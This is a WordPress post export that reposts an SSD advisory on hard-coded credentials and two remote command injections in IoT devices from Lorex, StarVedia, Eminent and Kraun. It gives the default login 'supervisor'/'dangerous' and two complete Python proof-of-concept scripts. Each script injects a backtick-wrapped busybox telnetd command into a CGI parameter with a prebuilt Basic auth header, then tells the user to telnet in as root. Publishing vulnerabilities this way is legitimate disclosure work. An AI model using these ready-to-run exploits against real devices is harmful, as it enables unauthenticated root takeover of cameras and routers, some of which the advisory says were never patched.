{"id":11424,"date":"2018-02-08T14:19:07","date_gmt":"2018-02-08T22:19:07","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/02\/08\/news-5195\/"},"modified":"2018-02-08T14:19:07","modified_gmt":"2018-02-08T22:19:07","slug":"news-5195","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/02\/08\/news-5195\/","title":{"rendered":"SSD Advisory \u2013 Multiple IoT Vendors &#8211; Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 08 Feb 2018 08:02:43 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3661\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3661');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities summary<\/strong><br \/> The following advisory describes three (3) vulnerabilities found in the following vendors:<\/p>\n<ul>\n<li>Lorex<\/li>\n<li>StarVedia<\/li>\n<li>Eminent<\/li>\n<li>Kraun<\/li>\n<\/ul>\n<p>The vulnerabilities found:<\/p>\n<ul>\n<li>Hard-coded credentials<\/li>\n<li>Remote command injection (2)<\/li>\n<\/ul>\n<p>It is possible to chain the vulnerabilities and to achieve unauthenticated remote command execution.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Robert Kugler (https:\/\/www.s3cur3.it), has reported this vulnerabilities to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> We tried to contact Lorex, Kraun and Eminent, attempts to establish contact went unanswered, therefore no details have been provided on a solution or a workaround.<\/p>\n<p>StarVedia were informed of the vulnerabilities and released patches to address them &#8211; &#8220;These two issues were fixed before your contacting us&#8221;<br \/> <span id=\"more-3661\"><\/span><br \/> <strong><u>Vulnerabilities details<\/u><\/strong><br \/> <strong>Hard-coded credentials<\/strong><br \/> Default users that can be used to log in in the router\u2019s website is: &#8220;supervisor&#8221;, with the password &#8220;dangerous&#8221;<\/p>\n<p><strong>Remote command injection (1)<\/strong><br \/> User controlled input is not sufficiently filtered and allows to an attacker to inject arbitrary commands by sending POST request to wlanset.cgi with malicious &#8216;SSID&#8217; parameter.<\/p>\n<p><u>Proof of Concept<\/u><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a7cccdad9137382723555\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python  import requests  import os  import time    print &#8220;Unauthenticated Remote Code Execution&#8221;    url = &#8216;http:\/\/VICTIM-IP\/cgi-bin\/wlanset.cgi&#8217; # Adjust IP address  payload = {&#8216;WiFiEnable&#8217;: &#8216;1&#8217;,&#8217;SSID&#8217;:&#8217;`\/bin\/busybox telnetd`&#8217;,&#8217;SECUNONE&#8217;:&#8217;1&#8242;,&#8217;WIFITEST&#8217;:&#8217;WiFi+test&#8217;}  headers = { &#8220;Authorization&#8221;: &#8220;Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==&#8221;, &#8220;Content-type&#8221;: &#8220;application\/x-www-form-urlencoded&#8221;}    r = requests.post(url, data=payload, headers=headers)  time.sleep(5)    print &#8220;nTry to connect to your target via telnet and use the user name root.&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p><strong>Remote command injection (2)<\/strong><br \/> User controlled input is not sufficiently filtered and allows to an attacker to inject arbitrary commands by sending POST request to smtpset.cgi with malicious &#8216;SMTPSERVER&#8217; parameter.<\/p>\n<p><u>Proof of Concept<\/u><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a7cccdad913e691377228\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python  import requests  import os  import time    print &#8220;Unauthenticated Remote Code Execution&#8221;    url = &#8216;http:\/\/VICTIM-IP\/cgi-bin\/smtpset.cgi&#8217; # Adjust IP address  payload = {&#8216;UseUserDefined&#8217;: &#8216;1&#8217;,&#8217;SMTPSERVER&#8217;:&#8217;`\/bin\/busybox telnetd`&#8217;,&#8217;SMTPPORT&#8217;:&#8217;25&#8217;,&#8217;SMTPNAME&#8217;:&#8221;,&#8217;SMTPPASSWD&#8217;:&#8221;,&#8217;SMTPTEST&#8217;:&#8217;SMTP+server+test&#8217;}  headers = { &#8220;Authorization&#8221;: &#8220;Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==&#8221;, &#8220;Content-type&#8221;: &#8220;application\/x-www-form-urlencoded&#8221;}    r = requests.post(url, data=payload, headers=headers)  time.sleep(5)    print &#8220;nTry to connect to your target via telnet and use the user name root.&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a7cccdad913e691377228-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a7cccdad913e691377228-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a7cccdad913e691377228-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a7cccdad913e691377228-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a7cccdad913e691377228-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a7cccdad913e691377228-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a7cccdad913e691377228-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a7cccdad913e691377228-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a7cccdad913e691377228-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a7cccdad913e691377228-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a7cccdad913e691377228-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a7cccdad913e691377228-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a7cccdad913e691377228-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a7cccdad913e691377228-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a7cccdad913e691377228-15\">15<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a7cccdad913e691377228-1\"><span class=\"crayon-p\">#!\/usr\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a7cccdad913e691377228-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a7cccdad913e691377228-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a7cccdad913e691377228-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">time<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a7cccdad913e691377228-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a7cccdad913e691377228-6\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Unauthenticated Remote Code Execution&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a7cccdad913e691377228-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a7cccdad913e691377228-8\"><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;http:\/\/VICTIM-IP\/cgi-bin\/smtpset.cgi&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\"># Adjust IP address<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a7cccdad913e691377228-9\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;UseUserDefined&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;1&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;SMTPSERVER&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8216;`\/bin\/busybox telnetd`&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;SMTPPORT&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8217;25&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;SMTPNAME&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;SMTPPASSWD&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;SMTPTEST&#8217;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-s\">&#8216;SMTP+server+test&#8217;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a7cccdad913e691377228-10\"><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Authorization&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Basic c3VwZXJ2aXNvcjpkYW5nZXJvdQ==&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Content-type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;application\/x-www-form-urlencoded&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a7cccdad913e691377228-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a7cccdad913e691377228-12\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a7cccdad913e691377228-13\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a7cccdad913e691377228-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a7cccdad913e691377228-15\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;nTry to connect to your target via telnet and use the user name root.&#8221;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3661\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 08 Feb 2018 08:02:43 +0000<\/strong><\/p>\n<p>Vulnerabilities summary The following advisory describes three (3) vulnerabilities found in the following vendors: Lorex StarVedia Eminent Kraun The vulnerabilities found: Hard-coded credentials Remote command injection (2) It is possible to chain the vulnerabilities and to achieve unauthenticated remote command execution. Credit An independent security researcher, Robert Kugler (https:\/\/www.s3cur3.it), has reported this vulnerabilities to Beyond &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3661\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Multiple IoT Vendors &#8211; Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[16041,11851,10757],"class_list":["post-11424","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-hard-coded-password","tag-remote-command-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11424","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11424"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11424\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11424"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11424"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11424"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}